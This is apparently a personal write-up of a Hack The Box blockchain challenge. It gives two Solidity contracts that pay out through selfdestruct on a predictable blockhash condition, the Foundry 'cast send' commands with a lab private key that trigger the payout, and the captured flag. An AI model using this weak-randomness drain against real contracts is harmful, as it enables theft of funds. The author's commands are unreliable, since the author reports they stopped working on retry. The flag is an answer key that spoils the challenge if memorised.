We have two files:
setup.sol
Copy pragma solidity 0.8.23 ;
import { RussianRoulette } from "./RussianRoulette.sol" ;
contract Setup {
RussianRoulette public immutable TARGET ;
constructor ( ) payable {
TARGET = new RussianRoulette { value : 10 ether }();
}
function isSolved () public view returns ( bool ) {
return address ( TARGET ). balance == 0 ;
}
} RussianRoulette.sol
Copy pragma solidity 0.8.23 ;
contract RussianRoulette {
constructor ( ) payable {
// i need more bullets
}
function pullTrigger () public returns ( string memory ) {
if ( uint256 ( blockhash ( block . number - 1 )) % 10 == 7 ) {
selfdestruct ( payable ( msg.sender )); // 💀
} else {
return "im SAFU ... for now" ;
}
}
} This is for working with the challenge:
nc 94.237.50.221 46539
This is for getting the flag:
nc 94.237.50.221 52428
This guide suggests using remix, so I did:
This did not work and I could not connect to the RPC URL in the named tools.
I found a better writeup:
[user@arch ~]$ cast send --rpc-url=http://94.237.50.221:46539 --private-key=0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8 0xe61aD3d13a4396003e971BC4BF94F24A3Bb21304 "pullTrigger()" 10
[user@arch ~]$ cast send --rpc-url=http://94.237.50.221:46539 --private-key=0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8 0x448dC8764488597cd729D0BceCa3a19545f8673F "isSolved()"
nc 94.237.50.221 52428
HTB{99%_0f_g4mbl3rs_quit_b4_bigwin}
The only two commands that I essentially required are these:
cast send --rpc-url=http://94.237.50.221:46539 --private-key=<private key> <target key> "pullTrigger()"
cast send --rpc-url=http://94.237.50.221:46539 --private-key=<private key> <setup key> "isSolved()"
After retrying however, this did not work anymore and I am not sure why.
